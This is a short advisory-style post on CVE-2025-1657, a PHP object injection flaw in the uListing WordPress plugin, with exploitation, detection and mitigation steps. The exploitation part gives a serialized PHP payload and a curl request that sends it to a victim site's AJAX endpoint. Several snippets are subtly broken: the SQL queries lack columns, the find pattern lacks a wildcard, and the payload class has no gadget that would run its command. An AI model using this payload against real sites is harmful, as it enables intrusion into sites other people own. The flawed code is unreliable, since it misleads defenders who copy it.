WordPress, PHP Object Injection, CVE-2025-1657 (Critical)

By /

How CVE-2025-1657 Works

The uListing WordPress plugin (up to v2.1.7) fails to validate user permissions in the `stm_listing_ajax` AJAX endpoint. Attackers with subscriber-level access can exploit this to modify post metadata and inject malicious PHP objects. When these objects are unserialized, arbitrary code execution occurs due to insecure deserialization. The lack of capability checks allows privilege escalation, leading to full site compromise.

DailyCVE Form

Platform: WordPress
Version: ≤ 2.1.7
Vulnerability: PHP Object Injection
Severity: Critical
Date: 03/28/2025

What Undercode Say:

Exploitation

1. Payload Crafting:

class Exploit {
public $cmd = 'touch /tmp/pwned';
}
echo serialize(new Exploit);

2. AJAX Request:

curl -X POST "https://victimsite.com/wp-admin/admin-ajax.php" \
-d "action=stm_listing_ajax&data=<SERIALIZED_PAYLOAD>"

Detection

1. Plugin Version Check:

SELECT FROM wp_options WHERE option_name = 'ulisting_version';

2. Log Analysis:

grep "stm_listing_ajax" /var/log/apache2/access.log

Mitigation

1. Immediate Action:

wp plugin deactivate ulisting

2. WAF Rule:

location ~ admin-ajax.php {
if ($args ~ "stm_listing_ajax") { return 403; }
}

3. Permanent Fix:

  • Update to uListing ≥ v2.1.8.

Post-Exploit Analysis

1. Backdoor Scan:

find /var/www/html -name ".php" -exec grep -l "eval(" {} \;

2. Database Audit:

SELECT FROM wp_postmeta WHERE meta_key LIKE '%ulisting%';

References

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-1657
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top